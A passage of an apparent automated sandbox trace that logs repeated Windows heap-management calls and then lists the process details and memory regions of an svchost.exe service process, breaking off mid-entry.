GetProcessHeap () returned 0x4510000 [0139.289] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x45170d8) returned 0x14 [0139.289] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x45170d8 | out: hHeap=0x4510000) returned 1 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x45172e8) returned 1 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x45172e8) returned 0x14 [0139.289] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x45172e8 | out: hHeap=0x4510000) returned 1 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x4512978) returned 1 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x4512978) returned 0x14 [0139.289] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x4512978 | out: hHeap=0x4510000) returned 1 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c338) returned 1 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c338) returned 0x14 [0139.289] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c338 | out: hHeap=0x4510000) returned 1 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c358) returned 1 [0139.289] GetProcessHeap () returned 0x4510000 [0139.289] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c358) returned 0x14 [0139.289] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c358 | out: hHeap=0x4510000) returned 1 [0139.289] GetProcessHeap () returned 0x4510000 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x4518540) returned 1 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x4518540) returned 0x30 [0139.290] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x4518540 | out: hHeap=0x4510000) returned 1 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c3b8) returned 1 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c3b8) returned 0x14 [0139.290] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c3b8 | out: hHeap=0x4510000) returned 1 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x4513828) returned 1 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x4513828) returned 0x24 [0139.290] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x4513828 | out: hHeap=0x4510000) returned 1 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c3d8) returned 1 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c3d8) returned 0x14 [0139.290] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c3d8 | out: hHeap=0x4510000) returned 1 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x4516f28) returned 1 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x4516f28) returned 0x4c [0139.290] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x4516f28 | out: hHeap=0x4510000) returned 1 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] GetProcessHeap () returned 0x4510000 [0139.290] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c3f8) returned 1 [0139.290] GetProcessHeap () returned 0x4510000 [0139.291] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c3f8) returned 0x14 [0139.291] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c3f8 | out: hHeap=0x4510000) returned 1 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x45173a8) returned 1 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x45173a8) returned 0x10 [0139.291] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x45173a8 | out: hHeap=0x4510000) returned 1 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x4516ea0) returned 1 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x4516ea0) returned 0x14 [0139.291] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x4516ea0 | out: hHeap=0x4510000) returned 1 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x4516ec0) returned 1 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x4516ec0) returned 0x14 [0139.291] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x4516ec0 | out: hHeap=0x4510000) returned 1 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x4516ee0) returned 1 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x4516ee0) returned 0x14 [0139.291] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x4516ee0 | out: hHeap=0x4510000) returned 1 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x4517958) returned 1 [0139.291] GetProcessHeap () returned 0x4510000 [0139.291] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x4517958) returned 0x14 [0139.292] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x4517958 | out: hHeap=0x4510000) returned 1 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x45173f0) returned 1 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x45173f0) returned 0x10 [0139.292] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x45173f0 | out: hHeap=0x4510000) returned 1 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c518) returned 1 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c518) returned 0x14 [0139.292] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c518 | out: hHeap=0x4510000) returned 1 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c2d8) returned 1 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c2d8) returned 0x14 [0139.292] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c2d8 | out: hHeap=0x4510000) returned 1 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c298) returned 1 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c298) returned 0x14 [0139.292] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c298 | out: hHeap=0x4510000) returned 1 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c1f8) returned 1 [0139.292] GetProcessHeap () returned 0x4510000 [0139.292] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c1f8) returned 0x14 [0139.292] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c1f8 | out: hHeap=0x4510000) returned 1 [0139.292] GetProcessHeap () returned 0x4510000 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c238) returned 1 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c238) returned 0x14 [0139.293] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c238 | out: hHeap=0x4510000) returned 1 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c2b8) returned 1 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c2b8) returned 0x14 [0139.293] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c2b8 | out: hHeap=0x4510000) returned 1 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c398) returned 1 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c398) returned 0x14 [0139.293] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c398 | out: hHeap=0x4510000) returned 1 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x4517498) returned 1 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x4517498) returned 0x10 [0139.293] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x4517498 | out: hHeap=0x4510000) returned 1 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c178) returned 1 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c178) returned 0x14 [0139.293] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c178 | out: hHeap=0x4510000) returned 1 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] GetProcessHeap () returned 0x4510000 [0139.293] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x4517510) returned 1 [0139.293] GetProcessHeap () returned 0x4510000 [0139.294] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x4517510) returned 0x10 [0139.294] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x4517510 | out: hHeap=0x4510000) returned 1 [0139.294] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0139.294] exit (_Code=0) Thread: id = 144 os_tid = 0x8 Process: id = "22" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x73857000" os_pid = "0x37c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0x218" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c3d5" [0xc000000f], "LOCAL" [0x7] Region: id = 3433 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3434 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3435 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3436 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3437 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3438 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3439 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3440 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3441 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 3442 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3443 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3444 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3445 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3446 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3447 start_va = 0x480000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3448 start_va = 0x4a0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 3449 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 3450 start_va = 0x4d0000 end_va = 0x4d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3451 start_va = 0x4e0000 end_va = 0x543fff monitored = 0 entry_point = 0x4f5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3452 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3453 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 3454 start_va = 0x580000 end_va = 0x586fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3455 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3456 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3457 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 3458 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3459 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3460 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3461 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 3462 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 3463 start_va = 0xb20000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 3464 start_va = 0xbe0000 end_va = 0xfdafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 3465 start_va = 0x10f0000 end_va = 0x10f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 3466 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 3467 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 3468 start_va = 0x1300000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 3469 start_va = 0x1380000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 3470 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 3471 start_va = 0x1500000 end_va = 0x157ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 3472 start_va = 0x15c0000 end_va = 0x15c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015c0000" filename = "" Region: id = 3473 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 3474 start_va = 0x1700000 end_va = 0x177ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 3475 start_va = 0x1780000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 3476 start_va = 0x1800000 end_va = 0x187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 3477 start_va = 0x1880000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 3478 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 3479 start_va = 0x1a00000 end_va = 0x1a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 3480 start_va = 0x1a90000 end_va = 0x1b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 3481 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 3482 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 3483 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 3484 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 3485 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 3486 start_va = 0x2100000 end_va = 0x2436fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3487 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 3488 start_va = 0x2800000 end_va = 0x28dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3489 start_va = 0x2940000 end_va = 0x2a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 3490 start_va = 0x2a40000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 3491 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 3492 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 3493 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 3494 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 3495 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 3496 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 3497 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 3498 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 3499 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 3500 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 3501 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 3502 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 3503 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 3504 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 3505 start_va = 0x3c00000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 3506 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3507 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3508 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3509 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3510 start_va = 0x7ff6bac60000 end_va = 0x7ff6bac6cfff monitored = 0 entry_point = 0x7ff6bac63980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3511 start_va = 0x7ffb0e620000 end_va = 0x7ffb0e652fff monitored = 0 entry_point = 0x7ffb0e62ae20 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 3512 start_va = 0x7ffb0eea0000 end_va = 0x7ffb0f057fff monitored = 0 entry_point = 0x7ffb0eea5550 region_type = mapped_file name = "wmalfxgfxdsp.dll" filename = "\\Windows\\System32\\WMALFXGFXDSP.dll" (normalized: "c:\\windows\\system32\\wmalfxgfxdsp.dll") Region: id = 3513 start_va = 0x7ffb0ff00000 end_va = 0x7ffb0ff87fff monitored = 0 entry_point = 0x7ffb0ff14510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 3514 start_va = 0x7ffb110e0000 end_va = 0x7ffb110f3fff monitored = 0 entry_point = 0x7ffb110e1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3515 start_va = 0x7ffb11100000 end_va = 0x7ffb111f5fff monitored = 0 entry_point = 0x7ffb11139590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3516 start_va = 0x7ffb11680000 end_va = 0x7ffb11690fff monitored = 0 entry_point = 0x7ffb11682fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3517 start_va = 0x7ffb12f30000 end_va = 0x7ffb12faefff monitored = 0 entry_point = 0x7ffb12f47110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3518 start_va = 0x7ffb1c720000 end_va = 0x7ffb1c74afff monitored = 0 entry_point = 0x7ffb1c72c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 3519 start_va = 0x7ffb1c750000 end_va = 0x7ffb1c85cfff monitored = 0 entry_point = 0x7ffb1c77f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 3520 start_va = 0x7ffb1da60000 end_va = 0x7ffb1da6dfff monitored = 0 entry_point = 0x7ffb1da62e50 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 3521 start_va = 0x7ffb1db80000 end_va = 0x7ffb1dbb7fff monitored = 0 entry_point = 0x7ffb1db868f0 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: 